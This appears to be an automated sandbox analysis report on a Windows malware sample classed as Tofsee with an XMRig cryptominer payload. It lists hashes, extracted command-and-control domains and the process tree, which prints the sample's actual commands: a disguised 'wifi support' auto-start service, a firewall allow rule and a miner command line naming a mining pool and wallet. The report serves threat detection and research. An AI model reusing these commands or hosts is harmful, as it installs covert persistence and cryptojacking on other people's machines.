Analysis
max time kernel: 5s
max time network: 162s
platform: windows7_x64
resource: win7-20231020-en
resource tags: arch:x64, arch:x86, image:win7-20231020-en, locale:en-us, os:windows7-x64, system
submitted: 19/11/2023, 23:50
Static task: static1
Behavioral task: behavioral1
  Sample: 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe
  Resource: win7-20231020-en
Behavioral task: behavioral2
  Sample: 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe
  Resource: win10v2004-20231023-en
General
Target: 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe
Size: 254KB
MD5: 02ac11d7691ed7141949fc5c03d5aae8
SHA1: b122e23b4dfb29d4efedbbe7a72c75d696f8a7ac
SHA256: 7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee
SHA512: c437f0cec3cbe5a62a650cafd0814016864c083a2df5a65000d0411b8249daec0744b7c948039a97848135a263ba183a9cb00876fbc3d22ee1e8322dfda0e55e
SSDEEP: 3072:M9xGAh803FPqB1HzqotaoQpxVKPk4hjw6EX7eUkpvTRSdnbr4rO/p/4CY/:w/8iYlAxVKMuELrdnbr4yG
Malware Config
Extracted: tofsee
  vanaheim.cn
  jotunheim.name
Signatures

XMRig Miner payload (8 IoCs)
  resource                                                                      yara_rule
  behavioral1/memory/1276-63-0x0000000000260000-0x0000000000351000-memory.dmp   xmrig
  behavioral1/memory/1276-72-0x0000000000260000-0x0000000000351000-memory.dmp   xmrig
  behavioral1/memory/1276-77-0x0000000000260000-0x0000000000351000-memory.dmp   xmrig
  behavioral1/memory/1276-76-0x0000000000260000-0x0000000000351000-memory.dmp   xmrig
  behavioral1/memory/1276-75-0x0000000000260000-0x0000000000351000-memory.dmp   xmrig
  behavioral1/memory/1276-74-0x0000000000260000-0x0000000000351000-memory.dmp   xmrig
  behavioral1/memory/1276-73-0x0000000000260000-0x0000000000351000-memory.dmp   xmrig
  behavioral1/memory/1276-71-0x0000000000260000-0x0000000000351000-memory.dmp   xmrig

Creates new service(s) (1 TTP)

Modifies Windows Firewall (1 TTP, 1 IoC)
  pid    Process
  2732   netsh.exe

Launches sc.exe (3 IoCs)
  Sc.exe is a Windows utility to control services on the system.
  pid    Process
  2740   sc.exe
  2816   sc.exe
  2744   sc.exe

Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (4 IoCs)
  description                         pid    Process                                                                   procid_target
  PID 2216 wrote to memory of 2324    2216   7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe   29
  PID 2216 wrote to memory of 2324    2216   7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe   29
  PID 2216 wrote to memory of 2324    2216   7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe   29
  PID 2216 wrote to memory of 2324    2216   7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe   29
Processes

C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"
  PID: 2216
  Signatures: Suspicious use of WriteProcessMemory
  Children:
    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\permvqxi\
      PID: 2324
    C:\Windows\SysWOW64\cmd.exe
      Command line: "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\jzzwiuki.exe" C:\Windows\SysWOW64\permvqxi\
      PID: 2344
    C:\Windows\SysWOW64\sc.exe
      Command line: "C:\Windows\System32\sc.exe" create permvqxi binPath= "C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d\"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe\"" type= own start= auto DisplayName= "wifi support"
      PID: 2740
      Signatures: Launches sc.exe
    C:\Windows\SysWOW64\sc.exe
      Command line: "C:\Windows\System32\sc.exe" description permvqxi "wifi internet conection"
      PID: 2816
      Signatures: Launches sc.exe
    C:\Windows\SysWOW64\sc.exe
      Command line: "C:\Windows\System32\sc.exe" start permvqxi
      PID: 2744
      Signatures: Launches sc.exe
    C:\Windows\SysWOW64\netsh.exe
      Command line: "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
      PID: 2732
      Signatures: Modifies Windows Firewall

C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe
  Command line: C:\Windows\SysWOW64\permvqxi\jzzwiuki.exe /d"C:\Users\Admin\AppData\Local\Temp\7a4cfb277cc054d761bde28a0f92caa9f142ad61959923a023a0d8248ad1c4ee.exe"
  PID: 2760
  Children:
    C:\Windows\SysWOW64\svchost.exe
      Command line: svchost.exe
      PID: 2764
      Children:
        C:\Windows\SysWOW64\svchost.exe
          Command line: svchost.exe -o fastpool.xyz:10060 -u 9mLwUkiK8Yp89zQQYodWKN29jVVVz1cWDFZctWxge16Zi3TpHnSBnnVcCDhSRXdesnMBdVjtDwh1N71KD9z37EzgKSM1tmS.200000 -p x -k -a cn/half --cpu-priority 1
          PID: 1276
Network
MITRE ATT&CK Enterprise v15
Downloads

File 1
  Filesize: 4.9MB
  MD5: 41e5c245a82a8504a70527e839ae883e
  SHA1: 080f8d3a98ac6769752e221403d17354a4afa0b5
  SHA256: 51fd31d38d471d045b16fd4b4fedc2cd52aedfe29845cc212e8d61bf5758e746
  SHA512: b281798cb0e3cf7c7bcf001dc7ff8f5f10af5e3b6c6ac12d286a0d07fb9e7d718c8b2c4e5f32df7fd50f4e7de92e1eefd353f7cb5a6b4d537dfae67648188b69

File 2
  Filesize: 5.4MB
  MD5: 9bbc5d1f6be289e2071874e4a8e1815a
  SHA1: 362815bd2e08ecca3f49caa89dc21b2fbd104dcf
  SHA256: c0ae437eaa40a777b2087deaadd1fabe001c2fc6208f54033b7eaa39847a3847
  SHA512: fce8a86aaa9284f5edc42a69af9ca3bcaaa3b524877b13a55705f330876f5c0871f46fd216aef955f541ac231379af2866ae8eca7805fb8c03114b7991aac525